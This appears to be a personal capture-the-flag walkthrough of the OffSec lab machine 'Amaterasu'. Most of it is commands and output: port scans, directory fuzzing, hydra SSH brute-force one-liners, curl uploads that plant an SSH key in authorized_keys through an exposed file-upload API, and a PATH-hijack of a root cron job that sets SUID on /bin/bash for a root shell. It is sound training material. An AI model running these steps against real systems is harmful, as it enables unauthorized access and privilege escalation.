🥊Amaterasu(OffSec)

Step 1: Run Nmap scan with below command

nmap 192.168.170.249 -sC -sV -vv -Pn -oN Amaterasu.txt

nmap -sC -sV -sS -p- --open -T5 192.168.170.249

Results: Opne and closed ports identifiied

PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.200 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT 22/tcp closed ssh reset ttl 61 111/tcp closed rpcbind reset ttl 61 139/tcp closed netbios-ssn reset ttl 61 443/tcp closed https reset ttl 61 445/tcp closed microsoft-ds reset ttl 61 2049/tcp closed nfs reset ttl 61 10000/tcp closed snet-sensor-mgmt reset ttl 61 Service Info: OS: Unix

Step 2 : Anonymous login allowed so we will try to enumerate using anonymous login.

Try to login however its getting timeout error

try to google vsFTPd 3.0.3 to identify an vulnerability based on the version

Using deep scan identified ports

nmap -p- -sC -sV -o deep_scan.nmap 192.168.170.249

25022/tcp open ssh OpenSSH 8.6 (protocol 2.0) | ssh-hostkey: |

256 33414/tcp open unknown

40080/tcp open http Apache httpd 2.4.53 ((Fedora))

tried using webrowser port 40080

Open Ports

21 tcp open ftp vsftpd 3.0.3

25022 tcp open ssh OpenSSH 8.6

33414 tcp open unknown

40080 tcp open http Apache httpd 2.4.53

Step 3: Try to use ffuf or feroxbuster or gobuster

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.170.249:40080/FUZZ

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.170.249:40080/

nmap 192.168.170.249 -sC -sV -vv -Pn -oN Amaterasu.txt

history -w ~/machines/Amaterasu/Amaterasu.txt

nmap --script ftp-* -p 21 192.168.170.249

ftp://anonymous:[email protected]

wget -m ftp://anonymous:[email protected] #Donwload all wget -m --no-passive ftp://anonymous:[email protected] #Download all

hydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S port] ftp://X.X.X.X

21 tcp open ftp vsftpd 3.0.3 25022 tcp open ssh OpenSSH 8.6 33414 tcp open unknown 40080 tcp open http Apache httpd 2.4.53

http://192.168.170.249:40080/images/ - nothing identified http://192.168.170.249:40080/styles/ - nothing identified

http://192.168.170.249:33414/help

0 "GET /info : General Info" 1 "GET /help : This listing" 2 "GET /file-list?dir=/tmp : List of the files" 3 "POST /file-upload : Upload files"

http://192.168.170.249:33414//file-list?dir=/home

0 "alfredo"

http://192.168.170.249:33414//file-list?dir=/home/alfredo

0 ".bash_logout" 1 ".bash_profile" 2 ".bashrc" 3 "local.txt" 4 ".ssh" 5 "restapi" 6 ".bash_history"

http://192.168.170.249:33414//file-list?dir=/home/alfredo/.ssh

0 "id_rsa" 1 "id_rsa.pub"

http://192.168.170.249:33414//file-list?dir=/home/alfredo/.ssh/id_rsa - error

http://192.168.170.249:33414//file-list?dir=/home/alfredo/local.txt -error

http://192.168.170.249:33414/file-upload

http://192.168.170.249:33414/info

0 "Python File Server REST API v2.5" 1 "Author: Alfredo Moroder" 2 "GET /help = List of the commands"

http://192.168.170.249:33414/file-list?dir=/etc/ssh/

0 "moduli" 1 "ssh_config.d" 2 "sshd_config.d" 3 "ssh_host_ed25519_key" 4 "ssh_host_ed25519_key.pub" 5 "ssh_host_ecdsa_key" 6 "ssh_host_ecdsa_key.pub" 7 "ssh_host_rsa_key" 8 "ssh_host_rsa_key.pub" 9 "ssh_config" 10 "sshd_config"

now we will try bruteforce ssh

hydra -l alfredo -P /root/funeasyenumpwd.txt 192.168.170.249:25022 ssh

hydra -L user.txt -P pass.txt 192.168.29.135 ssh -t 4

hydra -l admin -p admin ssh://192.168.0.1 -t 2

hydra -l root -p admin 192.168.1.105 -t 4 ssh

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 ssh

crunch 4 4 012345abcdef -o Documents/pass.txt

hydra -l root -P Documents/pass.txt 192.168.1.105 -t 4 ssh

hydra -L /usr/share/wordlists.rockyou.txt -P /usr/share/wordlists/rockyou.txt -M Documents/ip.txt -t 4 ssh

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 -V ssh

hydra -l username -P passwords.txt -s 2222 ssh -t 4 hydra -l username -P passwords.txt ssh://:2222 -t 4

hydra -l alfredo -P /root/funeasyenumpwd.txt -s 25022 192.168.170.249 ssh -t 4

hydra -l alfredo -P /usr/share/wordlists/rockyou.txt -s 25022 192.168.170.249 ssh -t 4 -V

feroxbuster -u http://192.168.170.249:33414/help -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 50

curl -F "[email protected]" http://192.168.170.249:33414/file-upload/

curl X POST --form "[email protected]" --form "filename=/home/alfredo/.ssh/test.txt" http://192.168.170.249:33414/file-upload

Generate key pair

ssh-keygen

curl X POST --form "file=@am_rsa.txt" --form "filename=/home/alfredo/.ssh/am_rsa" http://192.168.170.249:33414/file-upload

curl X POST --form "file=@am_rsa.pub.txt" --form "filename=/home/alfredo/.ssh/authorized_keys" http://192.168.170.249:33414/file-upload

[alfredo@fedora ~]$ cat local.txt 32de0601794be03f28063b97d6b7cea3

cat /etc/crontab /1 * * * * root /usr/local/bin/backup-flask.sh

[alfredo@fedora ~]$ cat /usr/local/bin/backup-flask.sh #!/bin/sh export PATH="/home/alfredo/restapi:$PATH" cd /home/alfredo/restapi tar czf /tmp/flask.tar.gz *

cd /home/alfredo/restapi/

/bin/bash -p

[alfredo@fedora ~]$ cd /home/alfredo/restapi/ [alfredo@fedora restapi]$ ls app.py main.py pycache [alfredo@fedora restapi]$ nano tar [alfredo@fedora restapi]$ [alfredo@fedora restapi]$ cat tar #!/bin/bash chmod u+s /bin/bash

[alfredo@fedora restapi]$ ll /bin/bash -rwxr-xr-x. 1

root root 1390080 Jan 25 2021 /bin/bash

[alfredo@fedora restapi]$ ls app.py main.py pycache tar

[alfredo@fedora restapi]$ ll total 12 -rw-r--r--. 1

alfredo alfredo 198 Mar 28 2023 app.py -rw-r--r--. 1

alfredo alfredo 2509 Mar 28 2023 main.py drwxr-xr-x. 2

alfredo alfredo 32 Mar 28 2023 pycache -rw-r--r-- 1

alfredo alfredo 33 Jun 8 08:06 tar

[alfredo@fedora restapi]$ chmod +x tar

[alfredo@fedora restapi]$ ll total 12 -rw-r--r--. 1

alfredo alfredo 198 Mar 28 2023 app.py -rw-r--r--. 1

alfredo alfredo 2509 Mar 28 2023 main.py drwxr-xr-x. 2

alfredo alfredo 32 Mar 28 2023 pycache -rwxr-xr-x 1

alfredo alfredo 33 Jun 8 08:06 tar

[alfredo@fedora restapi]$ /bin/bash -p bash-5.1

# whoami root bash-5.1

# ls app.py main.py pycache tar bash-5.1

# cd /root/ bash-5.1

# ls anaconda-ks.cfg build.sh proof.txt run.sh bash-5.1

# cat proof.txt 71198e9c77ad9fc124ab3c6751ba26c5

bash-5.1#

Linux Privilege Escalation: Wildcards with tarMedium